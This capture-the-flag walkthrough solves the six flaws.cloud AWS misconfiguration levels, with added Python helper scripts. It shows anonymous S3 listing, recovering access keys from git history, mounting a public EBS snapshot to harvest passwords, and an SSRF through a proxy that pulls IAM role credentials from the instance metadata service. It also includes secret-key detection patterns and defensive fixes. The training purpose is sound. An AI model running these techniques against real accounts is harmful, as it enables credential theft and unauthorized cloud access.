Cloud Security Club
Solving Flaws.Cloud: A Step-by-Step Guide
flaws.cloud is a collection of CTF-style challenges designed for beginners to learn about common AWS misconfigurations. It consists of six levels of increasing difficulty, each ending with an explanation of the hints used and the misconfiguration behind the level.
Level 1
Solution: To check whether a domain is served from an S3 static-website bucket, resolve the domain and run a reverse (PTR) lookup on the resulting IP address.
nslookup flaws.cloud
nslookup -type=ptr 52.92.209.12
The PTR answer is an s3-website hostname that carries the AWS region, here us-west-2. For S3 static website hosting behind a custom domain, the bucket must have the same name as the domain, so the bucket to test is "flaws.cloud". Try to list it anonymously with the following command:
aws s3 ls s3://flaws.cloud --no-sign-request
Alternatively, browse the bucket directly through one of its S3 endpoint forms; the region for the URL is the one found in the nslookup output.
http://<bucket-name>.s3.<region>.amazonaws.com
http://<bucket-name>.s3.amazonaws.com
http://s3.<region>.amazonaws.com/<bucket-name>
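The lookup and URL construction above, as an added example that is not part of the original post: it extracts the region from a PTR answer and builds the three endpoint forms. The nslookup output it parses is a constructed sample in the shape AWS returns, and it handles both hostname spellings AWS uses (s3-website-<region> for older regions, s3-website.<region> for newer ones).

```python
import re

# Constructed sample of `nslookup -type=ptr 52.92.209.12` output, modelled on
# the s3-website hostnames AWS returns for static-website bucket IPs.
SAMPLE_PTR_OUTPUT = """\
12.209.92.52.in-addr.arpa\tname = s3-website-us-west-2.amazonaws.com.
"""

# Both spellings occur in AWS PTR records: s3-website-<region> (older regions)
# and s3-website.<region> (newer regions such as eu-central-1).
_PTR_RE = re.compile(
    r"s3-website[-.]([a-z]{2}(?:-[a-z]+)+-\d)\.amazonaws\.com", re.I
)


def region_from_ptr(ptr_output: str):
    """Return the AWS region encoded in an S3 website PTR answer, or None
    when the address does not belong to S3 website hosting."""
    m = _PTR_RE.search(ptr_output)
    return m.group(1).lower() if m else None


def s3_urls(bucket: str, region: str):
    """The three endpoint forms under which a bucket can be browsed."""
    return [
        f"http://{bucket}.s3.{region}.amazonaws.com",
        f"http://{bucket}.s3.amazonaws.com",
        f"http://s3.{region}.amazonaws.com/{bucket}",
    ]


if __name__ == "__main__":
    region = region_from_ptr(SAMPLE_PTR_OUTPUT)
    print("region:", region)
    for url in s3_urls("flaws.cloud", region):
        print(url)
```

A PTR answer that is not an s3-website name (an EC2 or CloudFront hostname, for instance) yields None, which is the signal to stop assuming S3 and look at the hosting layer instead.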
Level 2
Solution: Opening http://level2-c8b217a33fcf1f839f6f1f73a00a9ae7.flaws.cloud.s3.us-west-2.amazonaws.com/ to list the files returns AccessDenied, so this bucket cannot be listed anonymously. An IAM principal without s3:ListBucket / s3:GetObject permissions cannot list it either:
aws --profile PROFILE s3 ls s3://level2-c8b217a33fcf1f839f6f1f73a00a9ae7.flaws.cloud
(Run with the profile "accessTesting", which has no permissions attached, the request is denied.)
Configure a set of valid AWS access keys that do have S3 permissions with aws configure, then try listing the bucket again.
aws --profile PROFILE s3 ls s3://level2-c8b217a33fcf1f839f6f1f73a00a9ae7.flaws.cloud
This time the listing succeeds. The bucket grants read access to any authenticated AWS account, not just to the account that owns it, which is barely better than being public, since anyone can create an AWS account.
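The grant behind this level is visible in the bucket's ACL. The following is an added example, not code from the original post: it walks an `aws s3api get-bucket-acl` result and flags grants to the two predefined S3 groups, AllUsers (anonymous) and AuthenticatedUsers (any AWS account). The ACL it checks is a constructed sample in the shape the CLI returns; the canonical user ID in it is a placeholder.

```python
import json

# Constructed sample in the shape of `aws s3api get-bucket-acl` output: the
# bucket owner has FULL_CONTROL and the AuthenticatedUsers group has READ.
# The canonical user ID is a placeholder, not a real account.
SAMPLE_ACL = json.loads("""
{
  "Owner": {"ID": "0000000000000000000000000000000000000000000000000000000000000000"},
  "Grants": [
    {"Grantee": {"Type": "CanonicalUser",
                 "ID": "0000000000000000000000000000000000000000000000000000000000000000"},
     "Permission": "FULL_CONTROL"},
    {"Grantee": {"Type": "Group",
                 "URI": "http://acs.amazonaws.com/groups/global/AuthenticatedUsers"},
     "Permission": "READ"}
  ]
}
""")

# The two predefined groups that extend a bucket beyond its owner's account.
ALL_USERS = "http://acs.amazonaws.com/groups/global/AllUsers"
AUTHENTICATED_USERS = "http://acs.amazonaws.com/groups/global/AuthenticatedUsers"


def overexposed_grants(acl: dict):
    """Return (who, permission) for every grant to AllUsers or AuthenticatedUsers.
    An empty list means the ACL only names specific canonical users."""
    findings = []
    for grant in acl.get("Grants", []):
        grantee = grant.get("Grantee", {})
        if grantee.get("Type") != "Group":
            continue
        uri = grantee.get("URI", "")
        if uri == ALL_USERS:
            findings.append(("anonymous (AllUsers)", grant["Permission"]))
        elif uri == AUTHENTICATED_USERS:
            findings.append(("any AWS account (AuthenticatedUsers)", grant["Permission"]))
    return findings


if __name__ == "__main__":
    for who, perm in overexposed_grants(SAMPLE_ACL):
        print(f"{perm} granted to {who}")
```

On a bucket ACL, READ means list; reading objects additionally needs an object ACL or a bucket policy. The fix is to drop the group grant and turn on S3 Block Public Access for the bucket (aws s3api put-public-access-block with BlockPublicAcls and IgnorePublicAcls set to true), which makes ACL grants to these groups ineffective even if someone re-adds them.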
Level 3
Solution: Listing the S3 bucket shows a .git directory. Download the bucket contents with:
aws s3 sync s3://level3-9afd3927f195e10225021a578e6f78df.flaws.cloud/ .
The git log shows that the first commit contained a mistake, so check out that commit to recover the files it added:
git log
git checkout <commit id>
The checkout restores a file named access_keys.txt, which contains an access key ID and a secret access key.
Now, configure the AWS CLI for the profile named “flaws” using the following command:
aws configure --profile flaws
Try the following command to list the buckets:
aws --profile flaws s3 ls
The output lists the buckets visible to that key, including the level4 bucket.
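Checking out an old commit is one way to recover the key; scanning the whole history is more reliable, because a secret removed in a later commit is still in every earlier one. The following is an added example, not code from the original post: it searches text for AWS access key IDs (AKIA for long-term keys, ASIA for temporary ones) and 40-character secrets, and `scan_git_history` feeds it the output of `git log -p --all` for a repository. The sample log is constructed, and the key values in it are the examples from the AWS documentation, not live credentials.

```python
import re
import subprocess

# Constructed sample of `git log -p --all` output for a repository whose first
# commit added a key file. The commit hash is a placeholder and the key values
# are the AWS documentation examples.
SAMPLE_GIT_LOG = """\
commit 1111111111111111111111111111111111111111
Author: dev <dev@example.com>

    first commit

diff --git a/access_keys.txt b/access_keys.txt
new file mode 100644
--- /dev/null
+++ b/access_keys.txt
+access_key AKIAIOSFODNN7EXAMPLE
+secret_access_key wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY
"""

# Long-term keys start with AKIA, STS keys with ASIA; 16 upper-case/digit chars follow.
ACCESS_KEY_RE = re.compile(r"(?<![A-Z0-9])(?:AKIA|ASIA)[A-Z0-9]{16}(?![A-Z0-9])")
# Secret keys are 40 base64-ish characters; only trust them on lines mentioning "secret".
SECRET_RE = re.compile(r"(?<![A-Za-z0-9/+=])[A-Za-z0-9/+=]{40}(?![A-Za-z0-9/+=])")


def find_aws_keys(text: str) -> dict:
    """Return candidate access key IDs and secrets found in text, deduplicated, in order."""
    ids, secrets = [], []
    for line in text.splitlines():
        for key in ACCESS_KEY_RE.findall(line):
            if key not in ids:
                ids.append(key)
        if re.search(r"secret", line, re.I):
            for secret in SECRET_RE.findall(line):
                if secret not in secrets:
                    secrets.append(secret)
    return {"access_key_ids": ids, "secret_candidates": secrets}


def scan_git_history(repo_dir: str) -> dict:
    """Scan every commit on every branch, including content deleted later."""
    log = subprocess.run(["git", "-C", repo_dir, "log", "-p", "--all"],
                         capture_output=True, text=True, check=True).stdout
    return find_aws_keys(log)


if __name__ == "__main__":
    print(find_aws_keys(SAMPLE_GIT_LOG))
```

A key found this way should be treated as compromised and rotated even if the commit that removed it looks old: rewriting history does nothing for copies already synced, which is exactly how this level is solved.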
Level 4
Solution: The command aws --profile flaws ec2 describe-snapshots returns every snapshot visible to the "flaws" profile (configured with the credentials obtained in level 3), which includes every public snapshot in the region, far too many to read through.
Filter it down to the target account by passing that account's ID. To get the Account ID from the leaked key:
aws --profile flaws sts get-caller-identity
Use the Account ID from that output to fetch only the snapshots owned by the target account (the documented flag is --owner-ids):
aws --profile flaws ec2 describe-snapshots --owner-ids 975426262029
To verify whether the above EBS snapshot is public or not, use the following command:
aws --profile flaws ec2 describe-snapshot-attribute --snapshot-id SNAPSHOTID --attribute createVolumePermission
A CreateVolumePermissions entry of 'Group': 'all' means the snapshot is public: every AWS account can create a volume from it. To read it, create a volume from the snapshot in your own account with the following command:
aws ec2 create-volume --availability-zone us-west-2b --region us-west-2 --snapshot-id SNAPSHOTID
Now create an EC2 instance from the AWS Management Console in the same region as the volume (us-west-2) and in the same availability zone (us-west-2b), because a volume can only be attached to an instance in its own AZ. Then, from the console, attach the volume to the instance; it appears as an additional block device, like a physical disk plugged into the machine.
To connect to the instance using SSH, follow the instructions provided by AWS.
Now, from the instance's terminal, identify the new block device (for example with lsblk) and mount its partition.
In a home directory on the mounted volume there is a shell script that creates the htpasswd file for NGINX basic authentication. It contains a hard-coded username and password; use these credentials to log in to level 5.
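The check in this level (does createVolumePermission include the group "all"?) is the kind of thing worth automating across every snapshot an account owns. The following is an added example, not code from the original post: it walks `describe-snapshots` output, looks up each snapshot's `describe-snapshot-attribute` result through a caller-supplied function, and reports the public ones together with the create-volume command from the walkthrough. Both CLI outputs are constructed samples; the snapshot IDs and the shared-with account ID are placeholders, not the real flaws.cloud snapshot.

```python
import json

# Constructed sample in the shape of `aws ec2 describe-snapshots --owner-ids ...`
# output; the snapshot IDs are placeholders, not the real flaws.cloud snapshot.
SAMPLE_SNAPSHOTS = json.loads("""
{"Snapshots": [
  {"SnapshotId": "snap-0123456789abcdef0", "OwnerId": "975426262029",
   "VolumeSize": 8, "State": "completed", "Description": "constructed sample"},
  {"SnapshotId": "snap-0fedcba9876543210", "OwnerId": "975426262029",
   "VolumeSize": 20, "State": "completed", "Description": "constructed sample"}
]}
""")

# Constructed `describe-snapshot-attribute --attribute createVolumePermission`
# results keyed by snapshot ID. {"Group": "all"} is what a public snapshot shows;
# the UserId entry is a placeholder account the second snapshot is shared with.
SAMPLE_ATTRIBUTES = {
    "snap-0123456789abcdef0": {"SnapshotId": "snap-0123456789abcdef0",
                               "CreateVolumePermissions": [{"Group": "all"}]},
    "snap-0fedcba9876543210": {"SnapshotId": "snap-0fedcba9876543210",
                               "CreateVolumePermissions": [{"UserId": "111111111111"}]},
}


def is_public(attribute: dict) -> bool:
    """True when every AWS account may create volumes from the snapshot."""
    perms = attribute.get("CreateVolumePermissions", [])
    return any(p.get("Group") == "all" for p in perms)


def shared_accounts(attribute: dict):
    """Accounts explicitly granted createVolumePermission: not public, but still shared."""
    perms = attribute.get("CreateVolumePermissions", [])
    return [p["UserId"] for p in perms if "UserId" in p]


def public_snapshots(describe_output: dict, lookup_attribute):
    """lookup_attribute(snapshot_id) returns the describe-snapshot-attribute dict
    (a plain dict lookup here; a CLI or boto3 call in practice)."""
    public = []
    for snap in describe_output.get("Snapshots", []):
        attr = lookup_attribute(snap["SnapshotId"])
        if attr and is_public(attr):
            public.append(snap["SnapshotId"])
    return public


def create_volume_command(snapshot_id: str, availability_zone: str) -> str:
    """The command from the walkthrough; the region is the AZ name minus its letter
    (true for standard AZs such as us-west-2b, not for Local Zone names)."""
    region = availability_zone[:-1]
    return (f"aws ec2 create-volume --availability-zone {availability_zone} "
            f"--region {region} --snapshot-id {snapshot_id}")


if __name__ == "__main__":
    for snap_id in public_snapshots(SAMPLE_SNAPSHOTS, SAMPLE_ATTRIBUTES.get):
        print("PUBLIC:", snap_id)
        print(create_volume_command(snap_id, "us-west-2b"))
```

To close the hole on a snapshot found this way, remove the group grant: aws ec2 modify-snapshot-attribute --snapshot-id <id> --attribute createVolumePermission --operation-type remove --group-names all. Anyone who already copied the snapshot keeps their copy, so credentials found on the volume still need rotating.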
Level 5
Solution: The instance runs a proxy that fetches whatever URL is given after a fixed prefix:
"http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/" + "proxy/" + "<target url>"
The links provided in the level description all go through this proxy, so the EC2 instance can be made to fetch any URL on our behalf (a server-side request forgery). Use it to reach the "magic" address 169.254.169.254, a link-local address that is only reachable from inside the instance.
This address serves the instance metadata service (IMDS). Instance metadata is information about the instance that can be used to configure or manage it, organised into categories such as hostname, events, security groups and IAM credentials.
"http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/" + "proxy/" + "169.254.169.254"
Two sets of credentials are found at different locations in the metadata tree: the IAM role's temporary credentials under /latest/meta-data/iam/security-credentials/<role-name> and the instance identity credentials under /latest/meta-data/identity-credentials/ec2/security-credentials/ec2-instance.
Note: Security credentials are the temporary credentials of the IAM role attached to the EC2 instance; they usually carry the additional IAM permissions the instance needs to reach other AWS services and resources. Identity credentials, on the other hand, are used by AWS services to identify the EC2 instance itself.
Configure the temporary credentials returned from the /security-credentials/ endpoint in a profile with aws configure --profile level5-flaws. Be aware that aws configure only prompts for the key ID, secret and region: the Token value must also be stored in the profile as aws_session_token (for example with aws configure set), otherwise every request signed with the temporary key is rejected.
aws --profile level5-flaws s3 ls s3://BUCKET
Level 6 can be accessed at the directory ddcc78ff/.
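The proxy request and the profile set-up above, as an added example that is not part of the original post: it builds the proxy URL for an IMDS path, renders the credentials JSON into a credentials-file section that includes the session token, and reports how long the set is still valid. The proxy prefix is the one from the challenge; the IMDS paths are the standard ones; the credentials JSON is a constructed sample in the shape IMDSv1 returns, with the AWS documentation example keys and a placeholder token.

```python
import json
from datetime import datetime, timezone

# Proxy prefix from the challenge; IMDS address and paths are the standard ones.
PROXY_BASE = "http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy/"
IMDS_HOST = "169.254.169.254"
ROLE_CREDS_PATH = "/latest/meta-data/iam/security-credentials/"
IDENTITY_CREDS_PATH = "/latest/meta-data/identity-credentials/ec2/security-credentials/ec2-instance"

# Constructed sample in the shape of the JSON IMDSv1 returns for a role's
# credentials. Key values are the AWS documentation examples; the token is a placeholder.
SAMPLE_ROLE_CREDS = json.loads("""
{
  "Code": "Success",
  "LastUpdated": "2024-01-01T00:00:00Z",
  "Type": "AWS-HMAC",
  "AccessKeyId": "ASIAIOSFODNN7EXAMPLE",
  "SecretAccessKey": "wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY",
  "Token": "IQoJb3JpZ2luX2VjEXAMPLETOKEN",
  "Expiration": "2024-01-01T06:00:00Z"
}
""")

_TS = "%Y-%m-%dT%H:%M:%SZ"


def proxy_url(host: str, path: str = "/") -> str:
    """URL that makes the instance fetch http://host/path on our behalf."""
    return f"{PROXY_BASE}{host}{path}"


def credentials_profile(name: str, creds: dict) -> str:
    """Render an ~/.aws/credentials section. aws_session_token is mandatory:
    `aws configure` never asks for it and STS keys are rejected without it."""
    return (f"[{name}]\n"
            f"aws_access_key_id = {creds['AccessKeyId']}\n"
            f"aws_secret_access_key = {creds['SecretAccessKey']}\n"
            f"aws_session_token = {creds['Token']}\n")


def seconds_until_expiry(creds: dict, now_iso: str = None) -> float:
    """Role credentials rotate; a negative result means this set already expired.
    now_iso is an IMDS-style UTC timestamp; None means the current time."""
    exp = datetime.strptime(creds["Expiration"], _TS).replace(tzinfo=timezone.utc)
    if now_iso is None:
        now = datetime.now(timezone.utc)
    else:
        now = datetime.strptime(now_iso, _TS).replace(tzinfo=timezone.utc)
    return (exp - now).total_seconds()


if __name__ == "__main__":
    print(proxy_url(IMDS_HOST, ROLE_CREDS_PATH))  # response lists the role name to append
    print(credentials_profile("level5-flaws", SAMPLE_ROLE_CREDS))
    print(f"valid for {seconds_until_expiry(SAMPLE_ROLE_CREDS):.0f} more seconds")
```

A plain GET-forwarding proxy like this one only works against IMDSv1. IMDSv2 first requires a PUT to /latest/api/token with a TTL header and then that token on every read, which a forwarding proxy cannot supply; setting HttpTokens to required on the instance is the standard fix for this class of SSRF.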
Level 6
Solution: Use the following command to list the managed policies attached to the user "level6", using the AWS profile "level6" (configured with the credentials handed out by this level).
aws --profile level6 iam list-attached-user-policies --user-name level6
This command lists two policies, each with its PolicyName and PolicyArn.
get-policy retrieves metadata about the specified managed policy, including its default version (DefaultVersionId) and the number of IAM users, groups and roles it is attached to. To obtain the actual policy document, use get-policy-version with that version ID.
aws --profile level6 iam get-policy --policy-arn ARN
get-policy-version retrieves one version of an IAM policy; its Document field is the set of permissions granted to the user "level6".
aws --profile level6 iam get-policy-version --version-id v1 --policy-arn ARN
The policy named list_apigateways suggests permission to read API Gateway resources. Take a look at this custom policy attached to the IAM user:
aws --profile level6 iam get-policy --policy-arn ARN
aws --profile level6 iam get-policy-version --version-id v4 --policy-arn ARN
The AWS API Gateway service enables you to create, publish, maintain, monitor, and secure APIs at any scale. It can be integrated with AWS Lambda to create serverless APIs, as well as with many other services such as DynamoDB, S3, and EC2.
Lambda functions can be invoked directly from API Gateway endpoints. The list-functions
command shows the presence of the Level6 function.
aws --profile level6 lambda list-functions
The function's resource-based policy shows that API Gateway is allowed to invoke it; the SourceArn condition in that policy names the REST API ID, the HTTP method and the path.
aws --profile level6 lambda get-policy --function-name Level6
To invoke the function, make an HTTP GET request to the API Gateway endpoint with the path /level6.
API Gateway URLs have the pattern: https://{api-id}.execute-api.{region}.amazonaws.com/{stage}
The REST API ID comes from the SourceArn in the function policy. To get the stage name, use the following command:
aws --profile level6 apigateway get-stages --rest-api-id RESTAPIID
The final URL for API gateway endpoint will be: https://s33ppypa75.execute-api.us-west-2.amazonaws.com/Prod/level6
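The step from the Lambda resource policy to the invoke URL, as an added example that is not part of the original post: it parses the `lambda get-policy` result, pulls the API Gateway SourceArn out of each statement that lets apigateway.amazonaws.com invoke the function, and assembles the execute-api URL once the stage name is known. The policy is a constructed sample in the shape the CLI returns (a JSON string inside the Policy field), using the API ID, region, path and account ID that appear in this walkthrough.

```python
import json
import re

# Constructed sample in the shape of `aws lambda get-policy --function-name Level6`
# output: the Policy field is itself a JSON document serialised as a string.
SAMPLE_GET_POLICY = {
    "Policy": json.dumps({
        "Version": "2012-10-17",
        "Id": "default",
        "Statement": [{
            "Sid": "constructed-sample",
            "Effect": "Allow",
            "Principal": {"Service": "apigateway.amazonaws.com"},
            "Action": "lambda:InvokeFunction",
            "Resource": "arn:aws:lambda:us-west-2:975426262029:function:Level6",
            "Condition": {"ArnLike": {"AWS:SourceArn":
                "arn:aws:execute-api:us-west-2:975426262029:s33ppypa75/*/GET/level6"}}
        }]
    }),
    "RevisionId": "00000000-0000-0000-0000-000000000000",
}

# arn:aws:execute-api:<region>:<account>:<api-id>/<stage>/<METHOD>/<path>
_SOURCE_ARN_RE = re.compile(
    r"^arn:aws:execute-api:([^:]+):(\d+):([^/]+)/([^/]+)/([^/]+)/(.*)$"
)


def api_gateway_triggers(get_policy_output: dict):
    """Return one dict per API Gateway route allowed to invoke the function."""
    policy = json.loads(get_policy_output["Policy"])
    triggers = []
    for st in policy.get("Statement", []):
        if st.get("Effect") != "Allow":
            continue
        principal = st.get("Principal", {})
        if not isinstance(principal, dict) or principal.get("Service") != "apigateway.amazonaws.com":
            continue
        cond = st.get("Condition", {})
        arns = []
        for op in ("ArnLike", "ArnEquals"):
            value = cond.get(op, {}).get("AWS:SourceArn")
            if isinstance(value, str):
                arns.append(value)
            elif isinstance(value, list):
                arns.extend(value)
        for arn in arns:
            m = _SOURCE_ARN_RE.match(arn)
            if m:
                region, account, api_id, stage, method, path = m.groups()
                triggers.append({"region": region, "account": account, "api_id": api_id,
                                 "stage": stage, "method": method, "path": "/" + path})
    return triggers


def invoke_url(trigger: dict, stage: str = None) -> str:
    """https://{api-id}.execute-api.{region}.amazonaws.com/{stage}{path}.
    The ARN usually carries '*' for the stage; pass the real name from get-stages."""
    stage = stage or trigger["stage"]
    return f"https://{trigger['api_id']}.execute-api.{trigger['region']}.amazonaws.com/{stage}{trigger['path']}"


if __name__ == "__main__":
    for trig in api_gateway_triggers(SAMPLE_GET_POLICY):
        print(trig["method"], invoke_url(trig, "Prod"))
```

A statement without a SourceArn condition is worth flagging separately: it lets any API Gateway in any account invoke the function, which is a different and worse exposure than the one this level demonstrates.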
This page just tells you to visit http://theend-797237e8ada164bf9f12cebf93b282cf.flaws.cloud/d730aa2b/
On visiting the final URL, we complete the final challenge.